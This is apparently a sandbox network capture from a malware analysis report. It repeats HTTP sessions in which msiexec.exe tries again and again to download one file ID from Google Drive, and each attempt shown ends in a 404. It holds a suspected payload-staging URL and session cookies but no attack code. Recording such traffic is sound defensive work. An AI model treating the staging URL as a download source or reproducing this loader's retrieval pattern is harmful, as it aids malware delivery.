                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:48 UTC1851INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgQxf1WGEN1wlHWPrniMlnu8u_A9hBEWZj4hK4735-17eU8RfAvEzkz032GAxDcYc4Uzg-rDq1U
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:48 GMT
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-BJkaS_hpz-hiLYcdBg9zyw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-11 03:27:48 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 39 4a 4a 56 61 63 67 6c 71 54 4f 34 59 4e 6f 37 69 46 4a 46 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="09JJVacglqTO4YNo7iFJFg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                42192.168.2.1150023142.250.184.2384437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:48 UTC417OUTGET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:49 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:49 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Content-Security-Policy: script-src 'nonce-fRLLojVnzDLv6lP26xGogw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                43192.168.2.1150024142.250.185.1614437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:50 UTC459OUTGET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:50 UTC1851INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgT9xr7it8Rgcr3Xz5lTsVVywixiDJXnErw1G6eJhumAf83hodMDaIkhepSZlZR--T4-DR3TzDI
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:50 GMT
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-W-WIyNEwV_ghaF9GwlXr9Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-11 03:27:50 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2d 38 41 67 72 73 51 61 2d 30 79 75 4c 58 75 4f 45 39 48 37 69 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="-8AgrsQa-0yuLXuOE9H7iQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                44192.168.2.1150025142.250.184.2384437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:51 UTC417OUTGET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:51 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:51 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-qaXqUM3Q6WTpSp0H38t2oA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                45192.168.2.1150026142.250.185.1614437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:52 UTC459OUTGET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:52 UTC1844INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgTDuc0UDFJO0_mm_jUyfvdGUqnSPsz-2_T52PC4_hsAPzY0kjneaYr-IlW4TZ6jTj-1
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:52 GMT
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-pyT6W1G6vLBQN3Z3lb22Lw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-11 03:27:52 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 66 6d 76 64 37 57 35 62 63 6a 6f 42 4b 47 77 4e 46 74 44 4a 34 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fmvd7W5bcjoBKGwNFtDJ4g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                46192.168.2.1150027142.250.184.2384437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:53 UTC417OUTGET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:53 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:53 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Security-Policy: script-src 'nonce-8EfQpF01J1HOgbO-lH-axw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                47192.168.2.1150028142.250.185.1614437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:54 UTC459OUTGET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:55 UTC1844INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgR6w1T6FK8Wa5pVwgMgrAD6WAPGSykW_xqDZhdsHtc6ni5MwNTDHVwUw3xk7ipZeuPS
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:54 GMT
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-g8yIBHOCvcYERNUCLEfd_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-11 03:27:55 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 41 76 62 5a 45 62 4f 4e 64 6f 34 6b 66 6e 33 79 46 4e 78 70 35 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="AvbZEbONdo4kfn3yFNxp5Q">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                48192.168.2.1150029142.250.184.2384437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:55 UTC417OUTGET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:56 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:56 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-P0mVC9wBM8zguCR-aVncIA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
